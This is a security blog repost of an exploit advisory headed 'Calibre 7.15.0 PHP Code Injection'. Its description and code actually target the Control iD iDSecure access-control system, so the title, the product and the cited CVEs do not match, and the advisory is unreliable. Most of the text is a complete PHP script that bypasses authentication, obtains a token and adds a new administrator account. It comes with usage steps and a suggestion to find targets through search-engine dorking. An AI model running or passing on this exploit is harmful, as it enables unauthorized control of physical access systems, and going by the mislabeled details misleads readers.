Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

Calibre 7.15.0 Code Injection

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 109
=============================================================================================================================================
| # Title : Calibre 7.15.0 =============================================================================================================================================
| # Title : Calibre 7.15.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://download.calibre-ebook.com/7.15.0/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: It used to exploit a vulnerability in the Control iD iDSecure access control system that allows unauthenticated remote attackers to access the system administration interface and add a new administrative user.

Main uses of the code: Version check: The code first checks whether the current version of the system is affected by the specified vulnerability (CVE-2023-6329).

If the version is affected by the vulnerability (less than or equal to 4.7.43.0), the exploit can be executed.

Sensitive data extraction:Extracts data such as serial and passwordRandom from the target server using a GET request to a specific API.

This data is used to generate a custom password (passwordCustom) which is part of the authentication process.

( https://packetstorm.news/files/id/180007/ CVE-2024-6782)

[+] save code as poc.php.

[+] Set Target : line 162

[+] USage : php poc.php

[+] PayLoad :


<?php

class ControlIDiDSecureAuthBypass {
private $target_uri;
private $new_user;
private $new_password;

public function __construct($target_uri, $new_user = null, $new_password = null) {
$this->target_uri = $target_uri;
$this->new_user = $new_user ?? bin2hex(random_bytes(4)); // Default to random alphanumeric user
$this->new_password = $new_password ?? bin2hex(random_bytes(6)); // Default to random alphanumeric password
}

// Check if vulnerable version is running
public function check() {
$url = $this->target_uri . '/api/util/configUI';
$response = $this->send_request($url, 'GET');

if ($response['code'] != 401) {
return 'Unknown';
}

$data = json_decode($response['body'], true);
$version = $data['Version'] ?? null;

if (is_null($version)) {
return 'Unknown';
}

echo "Got version: $version\n";
if (version_compare($version, '4.7.43.0', '<=')) {
return 'Appears';
}

return 'Safe';
}

// Exploit to add a new user
public function run() {
// Step 1: Get serial and passwordRandom
$url = $this->target_uri . '/api/login/unlockGetData';
$response = $this->send_request($url, 'GET');

if (!$response) {
throw new Exception("Failed to receive a reply from the server.");
}

$json = json_decode($response['body'], true);
$password_random = $json['passwordRandom'] ?? null;
$serial = $json['serial'] ?? null;

if (!$password_random || !$serial) {
throw new Exception('Unable to retrieve passwordRandom and serial');
}

echo "Retrieved passwordRandom: $password_random\n";
echo "Retrieved serial: $serial\n";

// Step 2: Create passwordCustom
$sha1_hash = sha1($serial);
$combined_string = $sha1_hash . $password_random . 'cid2016';
$sha256_hash = hash('sha256', $combined_string);
$short_hash = substr($sha256_hash, 0, 6);
$password_custom = base_convert($short_hash, 16, 10);

echo "Created passwordCustom: $password_custom\n";

// Step 3: Login with passwordCustom and passwordRandom to get JWT
$body = json_encode([
'passwordCustom' => $password_custom,
'passwordRandom' => $password_random
]);

$url = $this->target_uri . '/api/login/';
$response = $this->send_request($url, 'POST', $body);

if (!$response) {
throw new Exception("Failed to receive a reply from the server.");
}

$json = json_decode($response['body'], true);
$access_token = $json['accessToken'] ?? null;

if (!$access_token) {
throw new Exception('Did not receive JWT');
}

echo "Retrieved JWT: $access_token\n";

// Step 4: Add a new administrative user
$body = json_encode([
'idType' => '1',
'name' => $this->new_user,
'user' => $this->new_user,
'newPassword' => $this->new_password,
'password_confirmation' => $this->new_password
]);

$url = $this->target_uri . '/api/operator/';
$response = $this->send_request($url, 'POST', $body, $access_token);

if (!$response) {
throw new Exception("Failed to receive a reply from the server.");
}

$json = json_decode($response['body'], true);
if ($json['code'] !== 200 || $json['error'] !== 'OK') {
throw new Exception('Unexpected reply from server');
}

// Step 5: Confirm the new credentials work
$body = json_encode([
'username' => $this->new_user,
'password' => $this->new_password,
'passwordCustom' => null
]);

$url = $this->target_uri . '/api/login/';
$response = $this->send_request($url, 'POST', $body);

if (!$response) {
throw new Exception("Failed to receive a reply from the server.");
}

$json = json_decode($response['body'], true);
if (!isset($json['accessToken']) || !isset($json['unlock'])) {
throw new Exception('Received unexpected reply');
}

echo "New user '{$this->new_user}:{$this->new_password}' was successfully added.\n";
echo "Login at: " . $this->target_uri . "/#/login\n";
}

// Helper function to send HTTP requests
private function send_request($url, $method, $body = null, $token = null) {
$headers = [
'Content-Type: application/json'
];

if ($token) {
$headers[] = "Authorization: Bearer $token";
}

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
if ($body) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
}
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

$response_body = curl_exec($ch);
$response_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

return ['code' => $response_code, 'body' => $response_body];
}
}

// Example usage:
$target_uri = 'https://example.com';
$module = new ControlIDiDSecureAuthBypass($target_uri);
if ($module->check() === 'Appears') {
$module->run();
}

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Social Media Share